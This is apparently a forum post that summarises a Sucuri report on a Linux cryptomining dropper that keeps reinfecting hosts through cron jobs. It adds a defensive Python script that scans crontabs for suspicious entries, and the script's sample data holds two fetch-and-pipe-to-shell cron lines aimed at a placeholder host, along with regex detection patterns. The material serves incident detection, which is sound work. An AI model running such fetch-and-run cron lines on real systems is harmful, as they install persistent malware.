silversurfer
A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.
The malware was initially discovered on a web server whose CPU was being maxed out by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.
As Sucuri security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by a Bash script that the attackers dropped on the server via an unknown method, most probably after exploiting an unpatched vulnerability, brute-forcing their way in, or phishing the admin credentials.
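Because the dropper survives cleanup through the cron entries it adds, the first thing to audit on a suspect host is every crontab. The following is an added example (not code from the article or from Sucuri) that parses crontab text and flags entries that fetch and execute remote content; the crontab dump and the example.invalid URLs are constructed for the demo.

```python
import re

# Constructed sample crontab dump (not taken from the article): one normal
# entry followed by two fetch-and-run entries of the kind a reinfection
# dropper installs so the miner comes back after it is killed and deleted.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://example.invalid/x.sh | sh
@reboot wget -q -O- http://example.invalid/a | bash >/dev/null 2>&1
"""

# Heuristics for a command that re-downloads or unpacks a payload.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"/(tmp|dev/shm|var/tmp)/"), "runs from world-writable dir"),
]


def parse_cron_lines(text):
    """Yield (schedule, command) for each entry, skipping comments and
    VAR=value lines; handles both 5-field and @reboot-style schedules."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry, nothing to run
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd


def find_suspicious(text):
    """Return [(schedule, command, [reasons])] for entries matching SUSPICIOUS.
    For /etc/crontab the command still includes the user field; the
    patterns search the whole command string, so that does not matter."""
    hits = []
    for sched, cmd in parse_cron_lines(text):
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            hits.append((sched, cmd, reasons))
    return hits


if __name__ == "__main__":
    for sched, cmd, reasons in find_suspicious(SAMPLE_CRONTAB):
        print(f"[{', '.join(reasons)}] {sched} {cmd}")
```

On a live host, feed it the output of `crontab -l` for each user plus the contents of /etc/crontab and /etc/cron.d/*, and treat any hit as a reinfection hook to remove alongside the miner binary.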
Cryptomining Dropper and Cronjob Creator
Our website security analyst explains how a bash script performs a number of actions to configure crontab settings for malicious web server cryptominers.
blog.sucuri.net